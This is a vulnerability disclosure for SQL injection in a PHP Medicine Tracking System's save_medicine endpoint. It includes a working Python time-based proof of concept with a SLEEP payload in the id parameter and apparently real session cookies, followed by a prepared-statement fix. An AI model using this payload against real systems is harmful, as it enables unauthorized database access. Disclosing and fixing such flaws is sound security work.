Medicine Tracking System - SQL injection

heishou
Dec 25, 2023


Discoverer: heishou

Vendor: https://www.sourcecodester.com/
Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip

Document overview
Affected file: Master.php (specifically the save_medicine function)
Call point: manage_medicine.php (triggered by an Ajax request)
Vulnerability details
Type: SQL Injection
Location: save_medicine method in Master.php
Data entry point: Ajax POST request to /php-mts/classes/Master.php?f=save_medicine
Key parameters: id, name, description
Vulnerability description: When handling the Ajax request, save_medicine places the received parameters directly into the SQL query string instead of using a parameterized query, so attacker-controlled input is interpreted as part of the SQL statement and the endpoint is exposed to SQL injection.

Exploits:

Time-based PoC

```python
import requests
import time

# Target URL
url = "http://localhost/php-mts/classes/Master.php?f=save_medicine"

# Construct the malicious POST data
data = {
    'id': "' OR (SELECT 6647 FROM (SELECT(SLEEP(5)))VRGb)-- isuM",
    'name': 'qazxc',
    'description': 'adqmcooper'
}

# Include the provided cookie data
cookies = {
    'USER_NAME_COOKIE': 'admin',
    'SID_1': 'aa141d36',
    'mailpoet_page_view': '%7B%22timestamp%22%3A1694409700%7D',
    'mailpoet_subscriber': '%7B%22subscriber_id%22%3A2%7D',
    '_ga': 'GA1.1.324136046.1702458922',
    'Hm_lvt_6a3c7d9bb52a48ffadde32007d2a259e': '1702459185',
    '_pk_id.1.1fff': '4343a030b8a53617.1702459185.',
    'PHPSESSID': 'rnl5etfht6ltq81aoghoshm8rt'
}

# Record the time before sending the request
start_time = time.time()

# Send the request
response = requests.post(url, data=data, cookies=cookies)

# Record the time after the request returns
end_time = time.time()

# Print the response time
print(f"Response Time: {end_time - start_time} seconds")

# If the response time is significantly longer than 5 seconds, a SQL injection vulnerability is likely present
```
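The fix for the issue described above is to stop interpolating id, name and description into the query text. The following is an added example and not the project's own Master.php: it assumes a mysqli connection in $this->conn and a table named medicine_list with columns id, name and description (placeholder names, not taken from the post), and rewrites save_medicine with prepared statements plus an integer check on id.

```php
<?php
// Added example, not the project's code. Assumed: $this->conn is a mysqli
// connection; table medicine_list has columns id, name, description.
class MasterFixed
{
    private mysqli $conn;

    public function __construct(mysqli $conn)
    {
        $this->conn = $conn;
    }

    public function save_medicine(array $post): array
    {
        $name = trim((string)($post['name'] ?? ''));
        $description = trim((string)($post['description'] ?? ''));
        if ($name === '') {
            return ['status' => 'failed', 'msg' => 'name is required'];
        }

        // id is empty for an insert and must be an integer for an update.
        // A value such as "' OR (SELECT ...)-- " is rejected here, before
        // it can reach the database at all.
        $id = $post['id'] ?? '';
        if ($id !== '' && filter_var($id, FILTER_VALIDATE_INT) === false) {
            return ['status' => 'failed', 'msg' => 'invalid id'];
        }

        if ($id === '') {
            $stmt = $this->conn->prepare(
                'INSERT INTO medicine_list (name, description) VALUES (?, ?)'
            );
            $stmt->bind_param('ss', $name, $description);
        } else {
            $stmt = $this->conn->prepare(
                'UPDATE medicine_list SET name = ?, description = ? WHERE id = ?'
            );
            $id = (int)$id;
            $stmt->bind_param('ssi', $name, $description, $id);
        }

        // Bound values travel separately from the SQL text, so a quote or
        // comment marker inside name or description is stored as data and
        // cannot alter the statement.
        $ok = $stmt->execute();
        $msg = $ok ? '' : $this->conn->error;
        $stmt->close();
        return ['status' => $ok ? 'success' : 'failed', 'msg' => $msg];
    }
}
```

With this handler in place, the time-based PoC above completes in normal response time because the SLEEP() expression is never evaluated by MySQL.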
